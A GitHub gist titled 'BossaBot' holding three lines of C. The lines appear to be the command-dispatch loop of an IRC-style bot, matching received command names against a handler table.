Skip to content

Instantly share code, notes, and snippets.

@revENGR
Created May 3, 2020 10:29
Show Gist options
  • Save revENGR/7d5f1176457f8e7f0ac4dac105539983 to your computer and use it in GitHub Desktop.
Save revENGR/7d5f1176457f8e7f0ac4dac105539983 to your computer and use it in GitHub Desktop.
BossaBot
for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
if (!strcasecmp(name,"ERROR")) goto sa;
str=strtok((char*)NULL,"\n");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment